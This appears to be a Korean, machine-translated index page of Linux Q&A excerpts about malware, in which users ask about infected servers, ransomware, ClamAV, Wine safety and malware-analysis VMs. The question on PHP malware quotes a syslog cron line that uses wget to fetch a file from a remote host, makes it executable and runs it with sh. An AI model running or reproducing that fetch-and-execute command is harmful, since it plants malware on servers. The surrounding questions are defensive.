malware

한 배포판의 맬웨어가 이중/다중 부팅 시스템의 다른 배포판을 감염시키는 것을 방지하시겠습니까?
malware

한 배포판의 맬웨어가 이중/다중 부팅 시스템의 다른 배포판을 감염시키는 것을 방지하시겠습니까?

저는 멀티 부팅 기능이 있는 컴퓨터를 설정하려고 합니다. 3~5개의 서로 다른 Linux 배포판, 아마도 FreeBSD나 OpenIndiana, Windows일 수도 있습니다. 하나의 파티션을 모든 Linux 시스템의 스왑으로 사용하고 하나의 Linux 배포판을 사용하여 별도의 부팅 파티션에 GRUB 부트 로더를 설치 및 유지 관리하는 등 여러 SSD를 파티셔닝할 예정입니다. 자체 파티션(루트 및 기타 모든 파티션) 어쨌든 Linux 배포판 중 하나는 기본적으로 다양한 스크립트를 가져와 실행하는 프로...

Admin

삭제된 것으로 보이며 Windows 바이러스에 감염되었을 수 있는 플래시 드라이브에서 데이터를 복구하는 방법은 무엇입니까?
malware

삭제된 것으로 보이며 Windows 바이러스에 감염되었을 수 있는 플래시 드라이브에서 데이터를 복구하는 방법은 무엇입니까?

저는 중요한 데이터가 포함된 두 개의 파티션이 있는 256GB 플래시 드라이브를 가지고 있습니다. 오늘 일부 파일을 복사하기 위해 플래시 드라이브를 대학 Windows 컴퓨터에 연결해야 했습니다. 하지만 연결한 후 두 파티션의 모든 데이터가 사라졌고 이름이 두 개의 파일이었습니다.버전.dll그리고usbdriver.exe...아직 하나 있어요이름 없는 폴더...각 파티션에서. 저는 페도라 38을 사용하고 있습니다. 지금 데이터를 어떻게 복구하나요? ...

Admin

Linux 로그인을 위한 강력한 비밀번호 및 랜섬웨어
malware

Linux 로그인을 위한 강력한 비밀번호 및 랜섬웨어

로컬 네트워크에 Linux 컴퓨터가 연결되어 있다고 가정해 보겠습니다. 이 컴퓨터에 로그인한 순간 나만 아는 강력한 비밀번호가 사용되었습니다. 다른 컴퓨터를 통해 내 네트워크에 침투한 랜섬웨어가 Linux 컴퓨터의 데이터에 액세스할 수 있습니까? 랜섬웨어가 Linux 컴퓨터의 데이터를 변경할 수 있나요? 랜섬웨어가 자격 증명을 훔치는 데 능숙하다는 것을 읽었습니다. ...

Admin

내 Postgres Docker 컨테이너가 해킹/감염된 방법
malware

내 Postgres Docker 컨테이너가 해킹/감염된 방법

내 VPS가 감염되었습니다kdevtmpfsi 악성 코드, 두 배. 그게 문제입니다. 처음 감염되고 나서 가능한 모든 예방조치를 취했는데 이번에는 어떻게 또 감염됐는지 모르겠어요. 두 상황 모두 postgres docker 컨테이너로 인해 발생합니다. 처음으로 감염된 후, POSTGRES_PASSWORD공식 도커 이미지를 시작하기 위해 가장 강한 캐릭터 20개를 사용하고 postgres, 도커 컨테이너에서 호스트로의 포트 매핑을 제거했습니다. postgres는 내가 직접 만든 도커 네트워크를 사용하...

Admin

SSH 로그인: 세 번째 시도까지 비밀번호가 유효하지 않음(동일한 비밀번호)
malware

SSH 로그인: 세 번째 시도까지 비밀번호가 유효하지 않음(동일한 비밀번호)

내 가상 서버에 로그인하려고 하면 비밀번호가오직세 번째 시도에서는 성공했습니다! (사용동일한&옳은클립보드의 비밀번호) 시스템이 손상되었나요? ! 흥미롭게도 비밀번호 관리자를 사용하면 비밀번호를 문자별로 입력하는 데 약 0.5초밖에 걸리지 않고 즉시 작동됩니다. 묻다:여기서 무슨 일이 일어나고 있는지 어떻게 알 수 있나요? 참고 사항 센트OS 8 루트를 사용하지 않고 개인 키를 사용하여 로그인 SSH 루트 로그인이 비활성화되었습니다. 세션 내 sudo 명령도 작동하지 않습니다(비밀번호 관리자...

Admin

user:psacln으로 다시 전환하면 내 파일이 다시 감염됩니다.
malware

user:psacln으로 다시 전환하면 내 파일이 다시 감염됩니다.

디렉토리에 대한 쓰기 권한을 끄고 rm -v filename. 를 사용하여 파일을 다시 만들 수 touch filename있고 를 사용하여 내용을 추가할 수도 있습니다 nano filename. 그러나 일단 내 chown user:psacln filename파일이 즉시 다시 감염되었습니다. 재감염이란 파일의 내용이 변경되고 권한이 444로 변경되었다는 뜻입니다. 저는 Plesk를 사용하여 파일이 있는 웹사이트를 호스팅합니다. 해당 홈페이지는 워드프레스 홈페이지입니다. WP, 테마, 플러그인이 모두 최...

Admin

Debian 11에서 ClamAV를 구성하는 방법은 무엇입니까? (샘플 clamd.conf 및 올바른 위치 필요)
malware

Debian 11에서 ClamAV를 구성하는 방법은 무엇입니까? (샘플 clamd.conf 및 올바른 위치 필요)

Debian 9에서 Debian10/11로 업그레이드한 이후 Clamscan은 이전에 모든 스캔을 성공적으로 완료하는 대신 이제 메모리가 부족한 시스템을 즉시 실행합니다. 그러나 /etc/clamav/clamd.conf파일이 존재하지 않습니다. clamd.conf시스템에도 파일이 존재하지 않습니다. 이 파일은 어디에 속해 있나요? 우리만의 것을 만들 수 있나요? 최신 샘플 파일은 어디서 구할 수 있나요 conf? ...

Admin

시스템 로그에서 PHP 악성코드 발견
malware

시스템 로그에서 PHP 악성코드 발견

1분마다 실행되는 악성 코드가 있고 /var/log/syslog에서 볼 수 있습니다. Feb 1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/website.com 24 && rm -f xxxd) 어떤 PHP 스크립트가 실행되고 있는지 어떻게 알 수 있나요? 서버...

Admin

가상 머신에서 맬웨어 분석을 보호하시겠습니까?
malware

가상 머신에서 맬웨어 분석을 보호하시겠습니까?

여러 웹사이트에서 Cuckoo가 오래되었고, 더 이상 지원되지 않으며, 죽은 프로젝트라는 내용을 읽었습니다. 어쨌든 설치하는 것이 현명한가요? 랜섬웨어를 자유롭게 실행할 수 있는 랜섬웨어 분석실이 있으면 좋겠지만(샌드박스가 없으면 가상환경에서 빠져나올까봐 조금 걱정되긴 하지만) 그 외에는 딱히 샌드박싱박스는 필요하지 않은데... 다이나믹 레지스트리 키 작업/API 호출 등 악성코드/랜섬웨어 행위 분석 아니면 가상 머신 내에 가상 머신을 설치할 수 있나요?(이 경우 호스트는 Ubuntu이고 게스트는 W...

Admin

ClamAV가 트로이 목마를 감지했습니다. 다음 단계는 무엇입니까?
malware

ClamAV가 트로이 목마를 감지했습니다. 다음 단계는 무엇입니까?

운영 체제: Arch linux lts 커널. 오늘 내 컴퓨터에서 clamAV를 실행했는데 Unix.Trojan.MSShellcode-10 코드가 포함된 감염된 파일이 생성되었습니다. 그런 다음 나는전반적인 바이러스 분석파일. 69개 공급업체 중 2개 공급업체(google 및 clamAV)가 이를 악성으로 식별했습니다. 이 파일은 공식 홈페이지에서 가리키는 토렌트를 통해 다운로드한 vmware kali linux 배포 이미지의 일부입니다. 실행하면 sigtool --find-sigs Unix.Troj...

Admin

와인을 더욱 안전하게 사용하는 방법은 무엇일까요?
malware

와인을 더욱 안전하게 사용하는 방법은 무엇일까요?

Wine을 설치한 후 루트 폴더에 직접 액세스할 수 있는 az 드라이브가 있음을 발견했습니다. 나는 와인을 통해 Linux 시스템에 영향을 미치는 바이러스에 대한 많은 게시물과 뉴스를 보았습니다. 어떻게 하면 더 안전하게 만들 수 있나요? ...

Admin

내 웹캠이 해킹당했나요?
malware

내 웹캠이 해킹당했나요?

Linux(우분투) 사용자는 여기를 클릭하세요. 저는 오랫동안 Linux를 사용해왔기 때문에 명령줄에 익숙해졌습니다. 그래서 저는 이 문제를 해결하는 데 도움이 되는 조언과 도구를 찾고 있습니다.이것이 도움을 요청하기에 적합한 플랫폼이 아닌 경우 올바른 방향을 알려주세요. 내 웹캠이 해킹당했는지 어떻게 알 수 있나요? 일반적으로 브라우저를 실행하면 표시등이 잠시 동안 켜져 있습니다(보통 크롬에서). 일반적으로 마우스 오른쪽 버튼을 클릭하면 잠시 동안 표시등이 켜집니다. 시스템을 재부팅할 때마다 ...

Admin